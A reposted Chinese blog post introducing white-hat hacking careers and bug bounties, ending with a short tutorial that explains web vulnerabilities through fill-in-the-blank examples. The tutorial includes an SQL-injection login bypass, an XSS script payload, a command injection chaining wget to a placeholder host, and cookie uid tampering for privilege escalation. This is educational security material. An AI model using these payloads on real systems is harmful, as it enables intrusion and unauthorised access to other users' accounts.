如何成为白帽黑客
這次我要講的是如何成為白帽黑客。
有很多事情可以使一個(gè)人發(fā)狂,尤其是缺乏學(xué)習(xí)所需的堅(jiān)決與目標(biāo)感,所以我會(huì)先講磚為什么搬為什么不搬,是沾滿民脂的紅磚更適合搬還是混凝土小型空心的砌磚。
?
工欲善其事必先利其器,這是大家經(jīng)常能看見的一句話。在當(dāng)今互聯(lián)網(wǎng)下,想要更好地撂倒對(duì)手,我們需要更可怕的武器「一口箱子」,箱子里的武器不見可以組成任何一件兵器,用來對(duì)敵,但更重要的還是提著箱子的你。
我知道國內(nèi)外都有十四五歲的小白帽通過「漏洞獎(jiǎng)勵(lì)計(jì)劃」獲得過數(shù)萬獎(jiǎng)金,但獎(jiǎng)金不是最重要的,最重要的是,這種實(shí)踐方式可以讓我們更快地找到自己的方式,或者說找到自己。每個(gè)人的性格天賦又都是獨(dú)一無二的,因此找到真實(shí)的自己就等于找到了用的人最少的「 Hack mind 」。
關(guān)于我
我是長短短,目前在 PKAV Team 主導(dǎo)分布式漏洞掃描器的開發(fā),從事了 5 年的 Web 安全研究,接觸網(wǎng)絡(luò)安全已經(jīng)快十年了,為《 HTML5 規(guī)范》做過一些貢獻(xiàn),對(duì)瀏覽器及 Web 前端安全有深入的研究 ,獲得過 Google / Adobe / Apple 的「安全更新致謝」,《 HTML5 Security Cheatsheet 》的編寫人之一, 發(fā)布過目前世界最強(qiáng)大的 XSS 攻擊技術(shù)思維腦圖(?https://git.io/vPpcM?) ,當(dāng)然也懂點(diǎn)滲透。
這次 Live 主要包括下面這些問題:
1、如何選擇適合自己的白帽技能學(xué)習(xí)路線?
1.1:互聯(lián)網(wǎng)安全
1.2:移動(dòng)安全:
1.3:物聯(lián)網(wǎng)安全
1.4:客戶端安全
2、如何讓自己的 Skill 更匹配安全方向工作?
2.1:安全開發(fā)
2.2:安全運(yùn)維工程師
2.3:安全工程師
3、如何打造屬于自己的「一口箱子」?
3.1:滲透測試
3.2:漏洞挖掘
3.3:大數(shù)據(jù)安全
4、如何利用互聯(lián)網(wǎng)廠商「漏洞獎(jiǎng)勵(lì)計(jì)劃」邊學(xué)習(xí)邊賺錢?
4.1:如何選擇靠譜的廠商/平臺(tái)
4.2:如何選擇相匹配的目標(biāo)
4.3:如何與廠商/平臺(tái)NPC有效溝通
4.4:如何提交漏洞更容易被認(rèn)同
我的 Live,你不喜歡,答卷再說:
試 卷
姓名________ 學(xué)號(hào)________
首先我們來看這個(gè),試卷的名字和編號(hào)填寫,這個(gè)部分有“漏洞”嗎?
有
學(xué)生的姓名和編號(hào)都寫在這兒,沒有做任何保護(hù)措施,因此,你只要偷看了某人的試卷上的這部分內(nèi)容,然后把你的試卷的上的姓名和考生編碼寫成和他一樣的即可偽裝出他的身份。
漏洞攻擊成功
一、詩歌補(bǔ)寫
1 床前沒月光,___________。
2 春眠不覺曉,___________。
這道題有漏洞嗎?
有
這道題的答案本來應(yīng)該是“疑似地上霜”和“處處聞啼鳥”
But,問題中,并沒有規(guī)定答案里不能添加標(biāo)點(diǎn)符號(hào),所以,我完全可以把“疑是地上霜,舉頭望明月,低頭思故鄉(xiāng)”以及“處處聞啼鳥,夜來風(fēng)雨聲,花落知多少”當(dāng)做答案寫進(jìn)去。
漏洞再次進(jìn)攻成功 :P
二、數(shù)學(xué)運(yùn)算(在括號(hào)內(nèi)填入數(shù)字)
3 500 + 400 * 3 / 2 + 1 = ( )
4 ( 1 + 2 ) / 3 * 400 +500 = ( )
這個(gè)問題有漏洞嗎?
有
出題者規(guī)定了只能填入數(shù)字,但卻沒有說是什么數(shù)字,也沒有規(guī)定多少位,那么我的答案可以是 中文數(shù)字「壹佰壹拾圓」、羅馬數(shù)字「MCI」或「0000000000001101」。
漏洞第三次進(jìn)攻成功 :D
三、技術(shù)實(shí)踐
我們打開一個(gè)網(wǎng)頁提交登錄或者是搜索都會(huì)經(jīng)過服務(wù)器做一系列的處理又回到瀏覽器,在這個(gè)過程中我們提交的數(shù)據(jù)會(huì)被帶入到一系列的填空題中,有的是我們能猜到的,有的是意想不到的,有的會(huì)經(jīng)過SQL進(jìn)行查詢進(jìn)行填空,有的會(huì)被帶入到命令行中進(jìn)行填空,最后又把結(jié)果返回給瀏覽器進(jìn)行填空,也最后就是我們到的結(jié)果了。
- 用戶登錄 SQL 注入填空
- Q:select * from username = ____ and password=_____
- A:select * from username = "test" or ""="" and password="123456"
- 解釋:所謂SQL注入,就是通過把SQL命令插入到Web表單提交或輸入域名或頁面請(qǐng)求的查詢字符串,最終達(dá)到欺騙服務(wù)器執(zhí)行惡意的SQL命令。
- 用戶名 XSS 注入填空
- Q:<p style='color:red'>你好啊,尊敬的______<p>
- A:<p style='color:red'>你好啊,尊敬的?xxx<script>alert(1)</script><p>
- 解釋:攻擊者往Web頁面里插入惡意Script代碼,當(dāng)用戶瀏覽該頁之時(shí),嵌入其中Web里面的Script代碼會(huì)被執(zhí)行,從而達(dá)到惡意攻擊用戶的目的。
- 遠(yuǎn)程命令注入填空
- Q:ping _______
- A:ping?www.baidu.com?& wget xxxxxxxxxxx
- 解釋:用戶通過瀏覽器提交執(zhí)行命令,由于服務(wù)器端沒有針對(duì)執(zhí)行函數(shù)做過濾,導(dǎo)致執(zhí)行命令。
- Cookie 身份越權(quán)測試
- Cookie: uid=11426;
- Cookie: uid=1;
- 解釋:越權(quán)漏洞是比較常見的漏洞類型,可以理解為,一個(gè)正常的用戶A通常只能夠?qū)ψ约旱囊恍┬畔⑦M(jìn)行增刪改查,但是由于程序員的一時(shí)疏忽未對(duì)信息進(jìn)行增刪改查的時(shí)候沒有進(jìn)行一個(gè)判斷,判斷所需要操作的信息是否屬于對(duì)應(yīng)的用戶,可以導(dǎo)致用戶A可以操作其他人的信息。
了解了這幾個(gè)漏洞之后我們可以看到原理都類似,也很簡單,當(dāng)然我們不再局限于概念名詞就會(huì)發(fā)現(xiàn) web?安全的大部分漏洞都很簡單。更多時(shí)候,發(fā)現(xiàn)一個(gè)復(fù)雜的漏洞需要是只是耐心。
轉(zhuǎn)自?安全盒子
轉(zhuǎn)載于:https://www.cnblogs.com/lichina/p/6232114.html
總結(jié)
- 上一篇: 农村集体资产产权改革试点将全面展开
- 下一篇: 【LeetCode】马三来刷题之Vali